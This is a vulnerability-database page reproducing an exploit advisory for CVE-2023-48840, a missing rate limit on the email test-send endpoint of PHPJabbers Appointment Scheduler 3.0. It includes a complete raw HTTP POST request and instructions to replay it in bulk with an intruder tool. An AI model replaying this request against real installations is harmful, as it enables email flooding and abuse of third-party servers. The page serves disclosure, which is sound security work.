Lucene search
K

PHPJabbers Appointment Scheduler 3.0 Missing Rate Limiting

🗓️ 04 Dec 2023 00:00:00Reported by Rahad Chowdhury, BugsBD LimitedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 271 Views

PHPJabbers Appointment Scheduler v3.0 No Rate Limit in Emai

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-48840
7 Dec 202307:15
attackerkb
Circl
CVE-2023-48840
30 Dec 202315:01
circl
CNNVD
Appointment Scheduler Security Vulnerability
7 Dec 202300:00
cnnvd
CVE
CVE-2023-48840
7 Dec 202300:00
cve
Cvelist
CVE-2023-48840
7 Dec 202300:00
cvelist
EUVD
EUVD-2023-52871
3 Oct 202520:07
euvd
NVD
CVE-2023-48840
7 Dec 202307:15
nvd
Prion
Privilege escalation
7 Dec 202307:15
prion
Positive Technologies
PT-2023-30983 · Unknown · Appointment Scheduler
7 Dec 202300:00
ptsecurity
RedhatCVE
CVE-2023-48840
23 May 202504:23
redhatcve
Rows per page
`# Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email  
# Date: 19/11/2023  
# Exploit Author: BugsBD Limited  
# Discover by: Rahad Chowdhury  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/appointment-scheduler/  
# Version: v3.0  
# Tested on: Windows 10, Windows 11, Linux  
# CVE-2023-48840  
  
Descriptions:  
PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.  
Rate limiting is implemented in web applications and APIs to prevent  
abuse, such as brute-force attacks or excessive requests that could  
lead to resource exhaustion. When a rate limit is bypassed or not  
properly enforced, it opens the door for attackers to carry out  
malicious activities more quickly than intended, potentially leading  
to unauthorized access, data breaches, or service disruption.  
  
Steps to Reproduce:  
  
1. Request Data:  
  
POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSend  
HTTP/1.1  
Host: demo.phpjabbers.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 426  
Origin: https://demo.phpjabbers.com  
Referer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettings  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: close  
  
options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test  
  
2. Send it to intruder and configure then Start Attack and check mail.  
  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation